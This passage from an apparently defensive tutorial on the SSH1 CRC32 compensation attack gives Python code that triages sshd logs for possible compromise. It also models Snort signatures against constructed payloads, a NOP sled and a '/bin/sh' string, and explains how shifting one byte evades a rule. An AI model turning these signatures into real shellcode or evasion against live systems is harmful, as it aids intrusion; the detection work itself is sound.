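# Constructed sample in the style of the quoted sshd log (not the page's own lines).
SAMPLE_LOG = """\
Nov  1 18:48:11 victim sshd[9596]: log: Connection from 10.10.10.10 port 33383
Nov  1 18:48:11 victim sshd[9597]: log: Connection from 10.10.10.10 port 33384
Nov  1 18:48:11 victim sshd[9596]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:12 victim sshd[9598]: log: Connection from 10.10.10.10 port 33385
Nov  1 18:48:12 victim sshd[9597]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:12 victim sshd[9599]: log: Connection from 10.10.10.10 port 33386
Nov  1 18:48:12 victim sshd[9598]: fatal: Local: crc32 compensation attack: network attack detected
Nov  1 18:48:15 victim sshd[9599]: fatal: Local: Corrupted check bytes on input.
Nov  1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov  1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov  1 18:50:02 victim sshd[9620]: log: Connection from 192.0.2.7 port 40001
Nov  1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"sshd\[(?P<pid>\d+)\]: (?P<msg>.*)$")
CONN_RE = re.compile(r"^log: Connection from (?P<ip>[\d.]+) port (?P<port>\d+)$")
DETECTOR_MSG = "crc32 compensation attack"
TIMEOUT_MSG = "Timeout before authentication"


def parse_events(log_text):
    """Yield one dict per well-formed sshd line, in file order."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text, burst_threshold=3):
    """Count detector hits per source and flag the connections that matter.

    A child sshd that never logs a fatal, or logs only 'Timeout before
    authentication', after its source has already tripped the detector at
    least `burst_threshold` times is the one to look at: the brute force has
    stopped, and a successful run leaves the shell bound until the
    ten-minute authentication timeout fires.  (Assumed threshold; in a real
    log you would also drop pids that went on to log an accepted login.)
    """
    conns = {}          # pid -> connection record
    hits = Counter()    # source ip -> detector fatals
    for ev in parse_events(log_text):
        pid, msg = ev["pid"], ev["msg"]
        cm = CONN_RE.match(msg)
        if cm:
            conns[pid] = {"ip": cm["ip"], "port": int(cm["port"]),
                          "ts": ev["ts"], "fatal": None}
        elif msg.startswith("fatal:") and pid in conns:
            conns[pid]["fatal"] = msg
            if DETECTOR_MSG in msg:
                hits[conns[pid]["ip"]] += 1

    findings = []
    for pid, c in conns.items():
        if hits[c["ip"]] < burst_threshold:
            continue                      # source never tripped the detector
        if c["fatal"] is None:
            reason = "still open: no fatal logged, possible live shell"
        elif TIMEOUT_MSG in c["fatal"]:
            reason = "timed out without authenticating: backdoor likely ran"
        else:
            continue                      # detector or CRC check killed it
        findings.append((pid, c["ip"], c["port"], reason))
    return {"hits": dict(hits), "findings": sorted(findings)}


if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for ip, n in result["hits"].items():
        print(f"{ip}: {n} detector hits")
    for pid, ip, port, reason in result["findings"]:
        print(f"sshd[{pid}] {ip}:{port} -> {reason}")
```

On the sample the script reports three detector hits from 10.10.10.10 and flags sshd[9613] (no fatal yet) and sshd[9614] (timed out without authenticating); the connection from 192.0.2.7 is ignored because that source never tripped the detector.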
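To make concrete what the four Snort signatures above actually test, here is an added Python model of their content, offset and depth options run against constructed payloads. It is example code written for this page, not Snort and not part of the original article. It assumes that depth bounds the search window measured from offset (that is, the window is payload[offset:offset+depth]); the payloads are built inline and are not taken from sshdx.dump.

```python
"""Model of the four Snort rules quoted above, run over constructed payloads.

Added example; not Snort's engine and not part of the original article.
Assumption: `depth` limits the search to the `depth` bytes starting at
`offset`, i.e. payload[offset:offset + depth].
"""

# (pattern, offset, depth) per content option; depth 0 means "to the end".
RULES = {
    "EXPLOIT ssh CRC32 overflow /bin/sh": [(b"/bin/sh", 0, 0)],
    "EXPLOIT ssh CRC32 overflow filler": [(b"\x00" * 13, 0, 0)],
    "EXPLOIT ssh CRC32 overflow NOOP": [(b"\x90" * 16, 0, 0)],
    "EXPLOIT ssh CRC32 overflow": [
        (bytes.fromhex("00015700000018"), 0, 7),
        (bytes.fromhex("ffffffff0000"), 8, 14),
    ],
}


def content_matches(payload, pattern, offset=0, depth=0):
    """Snort-style content test restricted to the offset/depth window."""
    window = payload[offset:offset + depth] if depth else payload[offset:]
    return pattern in window


def evaluate(payload):
    """Return the msg of every rule whose content options all match."""
    return [name for name, contents in RULES.items()
            if all(content_matches(payload, p, o, d) for p, o, d in contents)]


# Constructed payloads (not bytes from the capture).
# Zero filler, a NOP sled, then the shell string seen in the ngrep dump.
PAYLOAD_SHELLCODE = (b"\x00" * 64 + b"\x90" * 16
                     + b"/bin/sh\x00h0h0h0, 7350, zip/TESO!")
# The fixed leading bytes the fourth rule looks for, then padding that is
# too short to trip the 13-byte filler rule.
PAYLOAD_HEADER = (bytes.fromhex("00015700000018") + b"\x00"
                  + bytes.fromhex("ffffffff0000") + b"\x00" * 8)
# Ordinary SSH version banner: should match nothing.
PAYLOAD_BANNER = b"SSH-1.5-1.2.31\n"


if __name__ == "__main__":
    for label, payload in (("shellcode", PAYLOAD_SHELLCODE),
                           ("header", PAYLOAD_HEADER),
                           ("banner", PAYLOAD_BANNER),
                           ("shifted header", b"\x00" + PAYLOAD_HEADER)):
        print(f"{label}: {evaluate(payload)}")
```

The "shifted header" case shows why offset and depth matter: inserting a single byte in front of the packet moves the first content out of its seven-byte window, so the fourth rule no longer fires even though both byte sequences are still present. The first three rules, by contrast, fire wherever their bytes land in the payload, which is exactly why they are easy to evade and, in the clear-text capture above, easy to hit.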